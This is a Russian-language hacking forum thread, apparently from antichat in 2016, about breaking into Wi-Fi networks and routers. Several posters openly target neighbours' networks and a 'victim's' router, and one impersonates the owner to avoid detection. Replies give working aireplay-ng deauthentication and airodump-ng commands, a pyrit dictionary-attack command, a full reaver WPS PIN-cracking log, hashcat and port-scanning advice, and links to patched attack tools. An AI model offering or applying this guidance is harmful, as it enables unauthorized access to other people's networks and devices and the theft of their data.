Нет, начальник обладает только айфоном и ноутом. Которые не подключилсь при очень хорошем сигнале. Лично я там не был. Точка рабочая, хендшейк же пойман.



У меня возникало 3 причины:

1 фильтр по мак

2 отключен DHCP

3 N only

(4) ошибся регистром при вводе пароля

Algierd
02.04.2016, 16:38
Подскажите, можно ли как-нибудь настроить маршрутизатор на приём wi-fi от соседской точки доступа?

Mistral
02.04.2016, 16:47
Ну,например режим моста(bridge) в роутере.

Algierd
02.04.2016, 16:55
Ну,например режим моста(bridge) в роутере.



Например, у меня есть маршрутизатор tplink tl-wr720n, подключен к ПК. Рядом есть сигнал от соседнего роутера. Используя только мой маршрутизатор без их физического соединения интернет на комп никак не передать?

Mistral
02.04.2016, 16:58
А режим моста-разве не связь роутера с роутером через вайфай?

Algierd
02.04.2016, 18:11
А режим моста-разве не связь роутера с роутером через вайфай?



Включил enable WDS, ротур стал ловить точки доступа, прописал в настройках пароль от нужной AP, вытаскиваю из ноута сетевой кабель, подрубаюсь к своему роутеру - всё работает. А как теперь настроить чтобы этот интернет по сетевому кабелю от роутера передавался на ПК?

Mistral
02.04.2016, 18:16
Соединял так пару роутеров со своим ради интереса.Работало.Ещё пару.Не работало.Отчего зависит,без понятия.

Algierd
02.04.2016, 18:24
Соединял так пару роутеров со своим ради интереса.Работало.Ещё пару.Не работало.Отчего зависит,без понятия.



У меня соединение с точкой доступа через мост работает. Но на машине нет wifi-адаптера, нужно сделать так чтобы интернет передавался на комп через сетевой кабель. А вот как это настроить не знаю.

Evgen555
02.04.2016, 18:50
как решить проблему!!! изменяю настройки роутера у жертвы но после перезагрузки страница недоступна роутеры разные провайдеры тоже что делать?

VladimirV
02.04.2016, 18:52
как решить проблему!!! изменяю настройки роутера у жертвы но после перезагрузки страница недоступна роутеры разные провайдеры тоже что делать?



Напишите, не спеша и членораздельно.

Alexmeh
02.04.2016, 19:29
А как теперь настроить чтобы этот интернет по сетевому кабелю от роутера передавался на ПК?



Первым делом, Вам надо отключить на втором устройстве (репитере) сервер DHC, затем, если у них одинаковый IP-адрес в локальной сети, надо на втором устройстве его изменить на другой для того, чтобы не было конфликта. Соединить кабелем порт LAN роутера с портом компа

Источник: http://nastroisam.ru/router-cherez-router/

Nastroisam.ru - статьи и инструкции по сетевым устройствам для начинающих.

.

Algierd
02.04.2016, 19:53
Первым делом, Вам надо отключить на втором устройстве (репитере) сервер DHC, затем, если у них одинаковый IP-адрес в локальной сети, надо на втором устройстве его изменить на другой для того, чтобы не было конфликта. Соединить кабелем порт LAN роутера с портом компа

Источник: http://nastroisam.ru/router-cherez-router/

Nastroisam.ru - статьи и инструкции по сетевым устройствам для начинающих.

.



Желательно на чужом роутере ничего не менять.

Alexmeh
02.04.2016, 19:55
Желательно на чужом роутере ничего не менять.



О чужом роутере речь не идет, там остается все как есть

Algierd
02.04.2016, 20:13
О чужом роутере речь не идет, там остается все как есть



Да, точно. Ступил) Всё работает, благодарю!

Evgen555
02.04.2016, 20:29
есть роутерскан , нашёл роутеры захожу на вебморду или как хотел настроить виртуал сервер на одном роутере всё сделал перезагрузил всё страница недоступна на другом хотел прошить таже история что нетак делаю PS я новичок несудите строго

Algierd
02.04.2016, 20:35
Первым делом, Вам надо отключить на втором устройстве (репитере) сервер DHC, затем, если у них одинаковый IP-адрес в локальной сети, надо на втором устройстве его изменить на другой для того, чтобы не было конфликта. Соединить кабелем порт LAN роутера с портом компа

Источник: http://nastroisam.ru/router-cherez-router/

Nastroisam.ru - статьи и инструкции по сетевым устройствам для начинающих.

.



А теперь вопрос: как после этого зайти в настройки моего роутера? Открывал с адреса tplinklogin.net, теперь при попытке зайти такое:

http://images.vfl.ru/ii/1459614892/69ea9061/12128285_m.png

Alexmeh
02.04.2016, 20:39
А теперь вопрос: как после этого зайти в настройки



в браузере ввести адрес, который прописывали

Algierd
02.04.2016, 20:43
в браузере ввести адрес, который прописывали



192.168.2.1-не работает, ошибка соединения.

Evgen555
02.04.2016, 20:54
или подскажите какими программами пользоваться для проникновения в чужой компьютер (есть кали линукс изучаю пока )

Alexmeh
02.04.2016, 21:05
192.168.2.1-не работает, ошибка соединения.



в компе, в свойствах сетевых подключений выбрать строку ""Протокол Интернета версии 4(TCP|IPv4)", в свойствах установить флажок на "Использовать следующий IP адрес", прописать адрес репитера -192.168.2.101, маска подсети -255.255.255.0 - ок

после настройки репитера вернуть все назад

http://www.tp-linkru.com/FAQ-14.html

VladimirV
02.04.2016, 21:28
есть роутерскан , нашёл роутеры захожу на вебморду или как хотел настроить виртуал сервер на одном роутере всё сделал перезагрузил всё страница недоступна на другом хотел прошить таже история что нетак делаю PS я новичок несудите строго



Зачем сразу гадить. Подучитесь и вперед!

Evgen555
02.04.2016, 23:33
я гадить и не хочу я просто хочу узнать почему так выходит и никто из вас неможет толком сказать

Alexmeh
02.04.2016, 23:40
я просто хочу узнать почему так выходит



Скорее всего некорректное изменение настроек (это и есть - гадить), после которых слетают предыдущие настройки и пароль.

Сначала на своих устройствах поучитесь

Bogdan87
03.04.2016, 09:44
ребята помогите пожалуйста, сделал загрузочную флешку kali 64 бит, ну никак не хочет запускаться , пробовал уже unetbootin, universal usb istaller, все равно при загрузке моргает черточка в черном экране и все дальше не идет, что делать?? ноутбук асус А52ju

Aibek
03.04.2016, 22:14
подскажите пожалуйста почему у меня в airodump-ng не видит клиентов . точки видит а клиентов нет

и как послать deauth не в клиентов а на точку

спасибо

jonefalcone
03.04.2016, 23:20
я знаю что раньше у сети был пароль


uCQWBrnLzf

Btc73WJiQR
похоже что всегда 10 символов разный регистр и цифры, и не похоже что они каким либо образом вычисляются из названия сети (в первом случае было 4578)

так пароль подбором даже с учетом этой информации подобрать не получится так?

что еще нужно узнать чтобы пометить эту сеть как невзламываемую и отбросить её?

Andrey9999
04.04.2016, 00:04
uCQWBrnLzf


Btc73WJiQR



Вообще, это пароли DOM.ru dir615...

jonefalcone
04.04.2016, 00:24
Вообще, это пароли DOM.ru dir615...



ну да можно такое как то взломать?

Andrey9999
04.04.2016, 00:29
ну да можно такое как то взломать?



Попробуй здесь)

Alexmeh
04.04.2016, 00:31
ну да можно такое как то взломать?



Попробовать по словарю:

http://forum.antichat.ru/threads/281655/page-64#post-3950544

Bogdan87
04.04.2016, 09:19
Ребята помогите пожалуйста вопрос я выше задавал (

atlas28
04.04.2016, 11:07
Ребята помогите пожалуйста вопрос я выше задавал (



Используй Win32 Disk Imager для записи кали на флешку. Не знаю, как в последней версии, но если у тебя на ноуте uefi, тогда тоже могут проблемы возникнуть: нужно либо в режим legacy bios переключаться, либо править папку efi на флешке (раньше так было, сейчас возможно исправили).

atlas28
04.04.2016, 11:12
подскажите пожалуйста почему у меня в airodump-ng не видит клиентов . точки видит а клиентов нет

и как послать deauth не в клиентов а на точку

спасибо



Ты, видимо, самой сути deauth не понимаешь) Он посылается от имени точки (т. е. ты притворяешься точкой и отправляешь пакеты с ее MAC) клиентам. Можно отправлять либо броадкаст, т. е. отключать всех


aireplay-ng wlan0mon --deauth 3 -a MAC_точки
либо конкретному клиенту.


aireplay-ng wlan0mon --deauth 3 -a MAC_точки -c MAC_клиента
Чтобы нормально видеть клиентов, зафиксируй airodump-ng на одном канале и сделай фильтрацию по bssid, например


airodump-ng wlan0mon -c номер_канала --bssid MAC_точки
и тогда будут видны клиенты, которые подключены к этой точке (однако они могут спать, тогда их видно не сразу будет).

VladimirV
04.04.2016, 11:24
однако они могут спать, тогда их видно не сразу будет.



Практически всегда отсылаю броадкаст, появляются клиенты, и тогда ловлю ХШ от точки отсоединяя клиента. Экономит время.

frops2
06.04.2016, 05:30
Всем привет.У меня такая проблема :открыл точку ,но не могу попасть на роутер ,видимо хозяин запретил вход по wifi, пробовал из разных систем,даже страница ввода пароля не открывается, роутерскан то же его не взял, роутер какой-то ASUS.В принципе, мне это нужно ,чтобы узнать имена устройств подключаемых к этой точки, маки я и так знаю.Для чего мне это нужно, думаю понимаете - чтобы не палиться, сижу мимикрируя под хозяина.В связи с этим вопрос: можно ли узнать имена устройств с соответствующими маками, желательно не подключаясь к сети, допустим через хендшейк, пароль сети я знаю, пробовал через Wireshark ,но что-то ничего похожего не увидел, нашел только строчки: apple, samsung, htc и т.д.

Вдогонку еще вопрос. Можно в какой нибудь системе, чтобы для каждой точки wifi ,был свой мак и имя хоста ? Допустим, есть несколько точек и к каждой в настройках указываю, чтобы подключаться с таким то именем и маком? В wifislax-4-10-1-Ru ,можно было для каждой точки в настройках подключение указать мак с которым буду подключаться ,а вот хост отображался системный . Пробовал на Wifislax и Kali, но там только мак можно поставить нужный ,а вот имя хоста ,только после перезагрузки меняется, что очень не удобно.

atlas28
06.04.2016, 09:41
Всем привет.У меня такая проблема :открыл точку ,но не могу попасть на роутер ,видимо хозяин запретил вход по wifi, пробовал из разных систем,даже страница ввода пароля не открывается, роутерскан то же его не взял, роутер какой-то ASUS.В принципе, мне это нужно ,чтобы узнать имена устройств подключаемых к этой точки, маки я и так знаю.Для чего мне это нужно, думаю понимаете - чтобы не палиться, сижу мимикрируя под хозяина.В связи с этим вопрос: можно ли узнать имена устройств с соответствующими маками, желательно не подключаясь к сети, допустим через хендшейк, пароль сети я знаю, пробовал через Wireshark ,но что-то ничего похожего не увидел, нашел только строчки: apple, samsung, htc и т.д.

Вдогонку еще вопрос. Можно в какой нибудь системе, чтобы для каждой точки wifi ,был свой мак и имя хоста ? Допустим, есть несколько точек и к каждой в настройках указываю, чтобы подключаться с таким то именем и маком? В wifislax-4-10-1-Ru ,можно было для каждой точки в настройках подключение указать мак с которым буду подключаться ,а вот хост отображался системный . Пробовал на Wifislax и Kali, но там только мак можно поставить нужный ,а вот имя хоста ,только после перезагрузки меняется, что очень не удобно.



А через ssh либо telnet не пробовал? Попробуй еще просканировать все порты, возможно вебморда висит на каком-то нестандартном.

VladimirV
07.04.2016, 09:24
Всем привет.У меня такая проблема :открыл точку ,но не могу попасть на роутер ,видимо хозяин запретил вход по wifi, пробовал из разных систем,даже страница ввода пароля не открывается, роутерскан то же его не взял, роутер какой-то ASUS.В принципе, мне это нужно ,чтобы узнать имена устройств подключаемых к этой точки, маки я и так знаю.Для чего мне это нужно, думаю понимаете - чтобы не палиться, сижу мимикрируя под хозяина.В связи с этим вопрос: можно ли узнать имена устройств с соответствующими маками, желательно не подключаясь к сети, допустим через хендшейк, пароль сети я знаю, пробовал через Wireshark ,но что-то ничего похожего не увидел, нашел только строчки: apple, samsung, htc и т.д.

Вдогонку еще вопрос. Можно в какой нибудь системе, чтобы для каждой точки wifi ,был свой мак и имя хоста ? Допустим, есть несколько точек и к каждой в настройках указываю, чтобы подключаться с таким то именем и маком? В wifislax-4-10-1-Ru ,можно было для каждой точки в настройках подключение указать мак с которым буду подключаться ,а вот хост отображался системный . Пробовал на Wifislax и Kali, но там только мак можно поставить нужный ,а вот имя хоста ,только после перезагрузки меняется, что очень не удобно.



Это RT13. Может просто подвисла морда?

Richmounth
07.04.2016, 16:03
Парни кто сталкивался с Pyrit, он работает только с базами данных или может со словарем?

erwerr2321
07.04.2016, 16:04
Парни кто сталкивался с Pyrit, он работает только с базами данных или может со словарем?



может

pyrit -r file.cap --all-handshakes -i dic.txt attack_passthrough

maikl 3773
13.04.2016, 11:28
Добрый всем день.Подскажите пожалуйста,как или чем проверить хендшейк? ( Правильный он или нет ).Может словлен с ошибками?

VladimirV
13.04.2016, 11:32
Добрый всем день.Подскажите пожалуйста,как или чем проверить хендшейк? ( Правильный он или нет ).



https://forum.antichat.ru/threads/351633/page-48#post-3970114

erwerr2321
13.04.2016, 11:32
Добрый всем день.Подскажите пожалуйста,как или чем проверить хендшейк? ( Правильный он или нет ).



Читать от сих

https://forum.antichat.ru/threads/351633/page-48#post-3969997

до сих

https://forum.antichat.ru/threads/351633/page-48#post-3971466

GHYJaxon4
13.04.2016, 17:20
Hey, Reaver, WTF?

Как видно из листинга ниже, пароль не высвечивается.

Соединение по пину при помощи различных утилит также не устанавливается (приходит пустой пароль).

Подозреваю, что имем дело с репитером, но всёже... Ваши версии?


[+] Associated with [мак точки] (ESSID: DIR-320NRU)
[+] Starting Cracking Session. Pin count: 10811, Max pin attempts: 11000
[+] Trying pin 90888090.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 77:35:0c:21:b0:c0:1c:a3:3e:ad:d2:0a:66:db:80:12
[P] PKE: 67:8e:c4:09:b6:23:9d:5a:56:eb:14:a6:b1:ab:cd:e3:52 :fb:5b:5b:f5:96:5d:3e:d0:21:87:12:0d:e4:85:b6:30:6 6:66:98:2d:4c:62:bb:b3:34:e8:a3:35:42:27:36:32:8f: d7:a2:ce:2e:03:2c:77:1b:0b:b1:21:6a:b0:0d:4f:7c:c7 :7d:42:26:86:f6:14:54:63:97:e0:ff:07:a8:da:e7:3d:3 3:a1:b7:bc:1f:21:6e:46:47:d4:dc:09:5d:b6:b8:1d:7c: 1f:fb:7a:96:0c:79:e0:82:8b:d2:d8:fe:1b:25:46:77:77 :bf:8d:c4:06:34:2e:95:35:8d:96:32:1f:bf:0d:f8:24:f d:84:c2:84:25:cc:40:8f:db:da:01:a1:70:27:34:77:6e: 14:23:1f:71:99:d6:04:05:12:e2:0c:f1:12:7e:a3:67:70 :a4:d9:f6:7e:bb:3d:2e:81:2c:a4:18:7b:e8:c3:ba:95:0 8:71:56:4d:12:2d:83:f5:57
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Name: Ralink Wireless Access Point
[P] WPS Model Number: RT2860
[P] Access Point Serial Number: 12345678
[+] Received M1 message
[P] R-Nonce: fe:34:a9:2c:5e:83:c7:44:5a:9c:8f:03:bb:32:96:a7
[P] PKR: d6:45:f1:72:3c:3f:71:00:1f:f3:bc:86:cf:f9:96:fd:cb :4b:95:c9:13:83:44:18:b1:4a:05:4b:77:62:97:fe:b8:a 7:52:4d:1f:d8:e1:f6:b4:04:d1:c3:14:58:5c:96:74:0e: 54:56:07:8a:e1:b8:f7:aa:18:7d:62:76:eb:98:ef:d7:f4 :88:89:59:0f:b3:1e:fc:ef:ee:a1:ce:35:bc:26:4c:f8:b c:ef:2a:3f:56:1f:dc:bd:cd:a4:68:60:76:a5:2f:73:18: af:e1:04:a1:45:34:c1:73:33:c4:26:2a:10:c5:3d:f3:36 :d5:1e:8c:3e:72:a4:45:a3:fc:ce:e2:82:81:08:ee:a0:0 f:44:a7:a9:ce:70:2f:55:ff:87:16:d9:b9:86:60:3f:9a: 66:81:3d:aa:63:75:5f:5b:23:3c:01:49:a8:66:0e:e2:f8 :1f:1c:57:73:b3:06:a7:26:ff:5f:7f:e3:32:f5:e2:25:7 e:48:66:6e:28:5d:30:41:d3
[P] AuthKey: a6:79:fb:5f:d2:c5:90:48:77:6d:c8:e6:33:17:fc:ef:00 :10:d8:5b:ed:ff:24:d6:a1:e8:c0:42:d5:ac:2c:3f
[+] Sending M2 message
[P] E-Hash1: 91:57:7f:57:c2:53:56:54:ff:ae:20:27:94:90:06:3b:94 :67:8a:ad:20:72:1b:1b:9b:b1:7c:1e:a8:cf:1a:ea
[P] E-Hash2: e2:6b:14:ef:0b:d4:5b:0b:50:b9:04:18:83:9c:0f:c4:9d :88:98:e8:d5:4c:96:9f:00:07:04:05:53:2d:d2:ba
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 38 seconds
[+] WPS PIN: '90888090'
[+] AP SSID: 'DIR-320NRU'

maus
13.04.2016, 18:08
Hey, Reaver, WTF?

Как видно из листинга ниже, пароль не высвечивается.

Подозреваю, что имем дело с репитером, но всёже... Ваши версии?



ну а зайти по пину и посмотреть пароль не судьба?

Vovster
15.04.2016, 11:31
Подскажите кто нибудь актуальную информацию по взлому wpa enterpise

есть ли вообще реальный способ проникнуть?

VasiliyP
15.04.2016, 13:09
Hey, Reaver, WTF?

Как видно из листинга ниже, пароль не высвечивается.

Соединение по пину при помощи различных утилит также не устанавливается (приходит пустой пароль).

Подозреваю, что имем дело с репитером, но всёже... Ваши версии?



wpa_supplicant в режиме максимально подробного логгирования + wpa_cli

вероятно, эти логи помогут понять в чём там дело.

Запускать примерно так: http://askubuntu.com/questions/120367/how-to-connect-to-wi-fi-ap-through-wps

it-mp2014
15.04.2016, 18:21
WPA2-Пароль из 8 цифр сколько в среднем ламать прогой из-под виндовс?

И чем лучше?

atlas28
15.04.2016, 18:24
WPA2-Пароль из 8 цифр сколько в среднем ламать прогой из-под виндовс?

И чем лучше?



Лучше всего использовать hashcat. Время зависит от мощности видеокарты. В большинстве случаев исчисляется минутами.

Andrey9999
15.04.2016, 18:26
WPA2-Пароль из 8 цифр сколько в среднем ламать



минут 10-40

зависит от видеокарты

it-mp2014
15.04.2016, 19:29
Лучше всего использовать hashcat.



Моя видяха слишком старая, ошибка openCL.dll

atlas28
15.04.2016, 21:10
Моя видяха слишком старая, ошибка openCL.dll



Скорее всего дело в драйвере. Какая модель карты и какая версия драйвера стоит?

on_eir_onaut
15.04.2016, 22:36
Здравствуйте. Приобрел alfa awus036h - при подключении вроде все хорошо, видит много сетей с хорошим сигналом, но скорость скачивания меньше, чем у старого TL-WN722N, который показывает худший сигнал. Куда копать подскажите?

henri2002
15.04.2016, 23:09
Здравствуйте. Приобрел alfa awus036h - при подключении вроде все хорошо, видит много сетей с хорошим сигналом, но скорость скачивания меньше, чем у старого TL-WN722N, который показывает худший сигнал. Куда копать подскажите?



в чипсете.

on_eir_onaut
16.04.2016, 00:12
в чипсете.



Неужели 8187L не может хотя бы 2-3 мегабайта в секунду качать? 722й с этой сетки качает, а альфа ~ 500-600 килобайт/сек и больше не разгоняется...

Mistral
16.04.2016, 00:15
Неужели 8187L не может хотя бы 2-3 мегабайта в секунду качать?



Там 54 мбит.Делите на 2.

3 мегабайта уже многовато.

atlas28
16.04.2016, 00:24
Неужели 8187L не может хотя бы 2-3 мегабайта в секунду качать? 722й с этой сетки качает, а альфа ~ 500-600 килобайт/сек и больше не разгоняется...



У меня эта альфа никогда больше 15 мегабит не выдавала, да и то это только если поставить на винде соответствующий драйвер и УМЕНЬШИТЬ (что странно) там мощность.

on_eir_onaut
16.04.2016, 00:29
Там 54 мбит.Делите на 2.

3 мегабайта уже многовато.



Почему на 2? На 8 же вроде? 54 / 8 = 6.75 мегабайт / сек ? Или я ошибаюсь?

on_eir_onaut
16.04.2016, 00:31
У меня эта альфа никогда больше 15 мегабит не выдавала, да и то это только если поставить на винде соответствующий драйвер и УМЕНЬШИТЬ (что странно) там мощность.



Какой драйвер и как уменьшить ? Ткните носом пожалуйста )

VladimirV
16.04.2016, 00:33
Там 54 мбит.Делите на 2.

3 мегабайта уже многовато.



Максимум что я видел на этой АЛЬФЕ - 1,8 мб\с (1,8 мегабайта). Мой друг WN822N, не ловить ХШ (совсем не ловит) как АЛЬФА, но выдает честные 5...6 мб на 150 мегабитах, на 300 выбирает все 100 входящих.

on_eir_onaut
16.04.2016, 00:42
А посоветуйте какой нибудь адаптер оптимальный по соотношению чувствительность/скорость?

Mistral
16.04.2016, 00:44
Неужели 8187L не может хотя бы 2-3 мегабайта в секунду качать?






Максимум что я видел на этой АЛЬФЕ - 1,8 мб\с (1,8 мегабайта). Мой друг WN822N, не ловить ХШ (совсем не ловит) как АЛЬФА, но выдает честные 5...6 мб на 150 мегабитах, на 300 выбирает все 100 входящих.



Давно не пользовался.Сейчас попробовал.Максимум,что увидел 2 мегабайта,а так в основном 1.6-1.8 на торренте.

Это естественно под боком.Если расстояние и помехи,будет вполне 500-600

atlas28
16.04.2016, 12:41
Какой драйвер и как уменьшить ? Ткните носом пожалуйста )



Драйвер брал с офф сайта alfa. Сейчас, смотрю, там новый появился, 2016го года, его не тестил. Посмотрите, попробуйте оба, поиграйте с настройками. Дело давно было. Но люди верно говорят: больше 2МБ/с вы из него не выжмете.

on_eir_onaut
16.04.2016, 22:32
Попробовал все драйверы. Результаты в пределах погрешности одинаковы. Буду тогда использовать awus036h чисто для вардрайвинга.

А для пользования инета мне лучше остаться на tl-wn722n + докупить к нему какую нибудь антенну 8-10дби , или же стоит прикупить

AWUS036NH (или китайский аналог на таком же чипсете - разница в цене в 3 раза) - какое у кого мнение?

atlas28
16.04.2016, 23:25
Попробовал все драйверы. Результаты в пределах погрешности одинаковы. Буду тогда использовать awus036h чисто для вардрайвинга.

А для пользования инета мне лучше остаться на tl-wn722n + докупить к нему какую нибудь антенну 8-10дби , или же стоит прикупить

AWUS036NH (или китайский аналог на таком же чипсете - разница в цене в 3 раза) - какое у кого мнение?



Alfa AWUS036H оставь для вардрайвинга, т. к. именно эта альфа будет лучшая (если, правда, оригинальная она у тебя). Она даже более чувствительна, чем новые альфы. Поэтому для юзания инета лучше просто использовать другой адаптер (в моем случае это TP-LINK Archer T4U, работает без нареканий, но для вардрайвинга совсем не годится).

on_eir_onaut
17.04.2016, 05:38
Если я на tl-wn722n прикручу антенну petra broad band - нормально будет? Есть ли на этот счет какие-либо ограничения?

Mednik
18.04.2016, 22:01
Если я на tl-wn722n прикручу антенну petra broad band - нормально будет? Есть ли на этот счет какие-либо ограничения?



Адаптеру абсолютно без разницы какая антенна , любой каприз за ваши деньги

maks1000
19.04.2016, 17:14
Ребят смогу ли я перебирать хэши этой видеокартой?

1.AMD Radeon HD 7520G + HD 7600M Dual Graphics

2.AMD Radeon HD 7600M Series

henri2002
19.04.2016, 17:33
Ребят смогу ли я перебирать хэши этой видеокартой?

1.AMD Radeon HD 7520G + HD 7600M Dual Graphics

2.AMD Radeon HD 7600M Series



можите.

cleric.80
19.04.2016, 19:14
интересует брут wps или как войти в роутер,,?... не нашел тему,

накачал всяких приложений на ведроид оне не входят пишут что я далеко от точки... да и где оне берут 8зн код неясно,

moaddip
20.04.2016, 12:54
Есть ли какие либо уязвимости Андройд или Эпл устройств подключенных к вашей wifi?

Узнать номер, стянуть фото и тд.. ?

спс

1D1
20.04.2016, 13:37
Приветствую! странное поведение соседского zyxel keenetic кажется omni не дает мне покоя, обрывает соединение, через пару секунд я снова на на нем... и такая карусель продолжается раз за разом.. попытки найти лучшее место приема та же песня.. вообщем может кто сталкивался, обоснует что к чему?)

зы: но кажется на днях я втопил arpsproof и проблема была не настолько явной) буду еще тестить.

всех благ! bom!

cleric.80
20.04.2016, 13:47
интересует брут wps или как войти в роутер,,?... не нашел тему,

накачал всяких приложений на ведроид оне не входят пишут что я далеко от точки... да и где оне берут 8зн код неясно,



ну что никто не скажет ?

1D1
20.04.2016, 13:50
Есть ли какие либо уязвимости Андройд или Эпл устройств подключенных к вашей wifi?

Узнать номер, стянуть фото и тд.. ?

спс



вроде с яблока чтобы фоточки слить понадобится iphoto) что само по себе уже веселее любой уязвимости))) может быть вариант только если вафля раздается с компа и ай девайс синхронизируется с ним но и тут ведь встанут айклауд айди и пасс..

1D1
20.04.2016, 13:58
ну что никто не скажет ?



jumpstart dumpper сломали пару сетей.

поставил reaver на оs x неуспех и таймаут.

без свистка кали пока не ставил) а нокла не в состоянии ловить такие сети.

цифры берутся из мак адреса и хитрых вычислений) которые не помогут с длинком и если хозяин точки сам нашаманил.

maks1000
20.04.2016, 22:28
Всем привет!!!

Ребят может кто поможет или даст ссылочку не как не могу установить драйвер видеокарты и остальные плюшки для перебора видеокартой нечего не выходит ((((( пользуюсь Kali 2.0 вроде как то можно из под Винды это делать прошу помощи совета буду очень благодарен за

Видеокарт:

1.AMD Radeon HD 7520G + HD 7600M Dual Graphics

2.AMD Radeon HD 7600M Series

Andrey9999
20.04.2016, 22:57
Всем привет!!!

Ребят может кто поможет или даст ссылочку не как не могу установить драйвер видеокарты и остальные плюшки для перебора видеокартой нечего не выходит ((((( пользуюсь Kali 2.0 вроде как то можно из под Винды это делать прошу помощи совета буду очень благодарен за

Видеокарт:

1.AMD Radeon HD 7520G + HD 7600M Dual Graphics

2.AMD Radeon HD 7600M Series



Проще всё готовое отсюда скачать

maks1000
20.04.2016, 23:44
Проще всё готовое отсюда скачать



Хотелось бы настроить Kali под это дело и вообще чем пользуютесь ребят если не секрет)???

Algierd
21.04.2016, 00:08
Провайдер поставил в доме роутеры Huawei, wpa-пароль на них выбит сзади в виде 10 значной комбинации букв/цифр. Например, на Huawei HG8245A пароль 7mwn29gdxm. Вопрос: есть ли на эти железки какие-нибудь базы "родных" или сгенерированных паролей для перебора?

Triton_Mgn
21.04.2016, 14:19
Хотелось бы настроить Kali под это дело и вообще чем пользуютесь ребят если не секрет)???



Обычно котаны пользуются котом. Hashcat

nomy
22.04.2016, 13:48
1) Пользуюсь Awus036nh когда перевожу в режим мониторинга появляется две строчки и у меня из за этого сомнения правильно ли работает все

(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)

( mac80211 station mode vif disabled for [phy0]wlan0)

2) при мониторинге определенной точки адаптер не видит клиентов в чем может быть проблема? (клиенты в точке 100% есть)

мб проблема в том что криво установил драйверы на kali?

kentuha
22.04.2016, 19:32
Ребят подскажите проблема следующая.

Для ловли хендшейков пользуюсь старым добрым aircrack.

После переустановки системы (Ubuntu 16.04) надобности не было во взломе wifi.

Недавно решил проверить на прочность пару соседских сетей.

И сначала не придал значения, но потом явно проследил момент, что когда мониторю через airodump-ng, вижу только сети, но не одного законекченного устройства. Тоесть вообще. И это из 10 сетей.

Потом для интереса включил опытный роутер, зацепил 3 устройства, и аналогично их не увидел. Плюс ещё такой момент.

Wifite обычно показывает включён ли wps. Сейчас типа везде выключен. Хотя в опытном роутере я его включил.

В чем может быть проблема? Убунту криво встал? Либо aircrack может не так встал. Опытным взглядом скажите куда копать?

Или как проверить роьотоспособность aircrack

atlas28
22.04.2016, 19:39
Ребят подскажите проблема следующая.

Для ловли хендшейков пользуюсь старым добрым aircrack.

После переустановки системы (Ubuntu 16.04) надобности не было во взломе wifi.

Недавно решил проверить на прочность пару соседских сетей.

И сначала не придал значения, но потом явно проследил момент, что когда мониторю через airodump-ng, вижу только сети, но не одного законекченного устройства. Тоесть вообще. И это из 10 сетей.

Потом для интереса включил опытный роутер, зацепил 3 устройства, и аналогично их не увидел. Плюс ещё такой момент.

Wifite обычно показывает включён ли wps. Сейчас типа везде выключен. Хотя в опытном роутере я его включил.

В чем может быть проблема? Убунту криво встал? Либо aircrack может не так встал. Опытным взглядом скажите куда копать?

Или как проверить роьотоспособность aircrack



Wifite зависит reaver'a, при том от конкретной версии. В нем вообще глюков много, на днях как раз занимался их исправлением. reaver то установлен вообще? Потому что wifite использует wash для определения wps. Если нужно, могу скинуть свою исправленную версию wifite.

kentuha
22.04.2016, 19:41
Wifite зависит reaver'a, при том от конкретной версии. В нем вообще глюков много, на днях как раз занимался их исправлением. reaver то установлен вообще? Потому что wifite использует wash для определения wps. Если нужно, могу скинуть свою исправленную версию wifite.



Да если не сложно, был бы благодарен!

atlas28
22.04.2016, 20:09
Да если не сложно, был бы благодарен!



https://cloud.mail.ru/public/3KRL/aTHecTCyZ Вот этот должен нормально работать (но руками в любом случае надежнее), только обязательно надо поставить вот этот reaver https://github.com/t6x/reaver-wps-fork-t6x именно отсюда скачать исходники, скомпилировать и установить. Pixiewps тоже необходим.

UPD: ссылку исправил, изначально скинул версию с косяком небольшим. Тут все норм.

nomy
22.04.2016, 21:37
хорошо а мне с дровами на awus036nh поможет кто ибо аиродамп не видит клиентов сетки при использовании адаптера

Triton_Mgn
22.04.2016, 21:53
хорошо а мне с дровами на awus036nh поможет кто ибо аиродамп не видит клиентов сетки при использовании адаптера



Может вы проверите свой адаптер на фейковость? У меня такой уже лет 5 - работает жужжит, поставьте Wifislax на флешку, проверьте как он себя ведет например на minidwep, а то читаю целый день ваши сообщения и не пойму когда вы повернули не туда.

nomy
22.04.2016, 22:06
Может вы проверите свой адаптер на фейковость? У меня такой уже лет 5 - работает жужжит, поставьте Wifislax на флешку, проверьте как он себя ведет например на minidwep, а то читаю целый день ваши сообщения и не пойму когда вы повернули не туда.



свернул не туда потому что с оф прошивкой какие то запары в makefile файле если верить гуглу

atlas28
22.04.2016, 22:09
при мониторинге определенной точки адаптер не видит клиентов в чем может быть проблема? (клиенты в точке 100% есть)

мб проблема в том что криво установил драйверы на kali?



А если broadcast deauth послать, то не появляются? Хендшейк получается поймать? .cap файлы смотрели? Пакеты от клиентов там есть?

Triton_Mgn
22.04.2016, 22:12
свернул не туда потому что с оф прошивкой какие то запары в makefile файле если верить гуглу



Не не давайте остановимся - опиши систему. какие нафиг дрова, она работает из коробки.

Вы прошили чип паяльником?

Triton_Mgn
22.04.2016, 22:21
Я правильно понимаю, что разговор идет про железку? Или все же Software.

Один замечательный совет вам уже дан - ну хоть Airslax на флешку поставьте, сканируйте эфир. Вы пошли не туда, когда хотели поставить какие то дрова. А между прочим работает и так. Ubuntu тоже.

nomy
22.04.2016, 22:29
А если broadcast deauth послать, то не появляются? Хендшейк получается поймать? .cap файлы смотрели? Пакеты от клиентов там есть?



не пробывал посылать сигнал смерти в пустоту))) там же вроде надо указать bssid цели

nomy
22.04.2016, 22:30
Я правильно понимаю, что разговор идет про железку? Или все же Software.

Один замечательный совет вам уже дан - ну хоть Airslax на флешку поставьте, сканируйте эфир. Вы пошли не туда, когда хотели поставить какие то дрова. А между прочим работает и так. Ubuntu тоже.



тогда я не понимаю к чему к адаптеру дрова если их не надо ставить Оо?

Andrey9999
22.04.2016, 22:40
тогда я не понимаю к чему к адаптеру дрова если их не надо ставить Оо?



В wifislax'е например, они уже есть

atlas28
22.04.2016, 22:40
не пробывал посылать сигнал смерти в пустоту))) там же вроде надо указать bssid цели



BSSID - это MAC роутера, от его имени посылаются пакеты. Можно посылать конкретному клиенту, а если не указывать клиента, то отключать будет всех.

Как пример


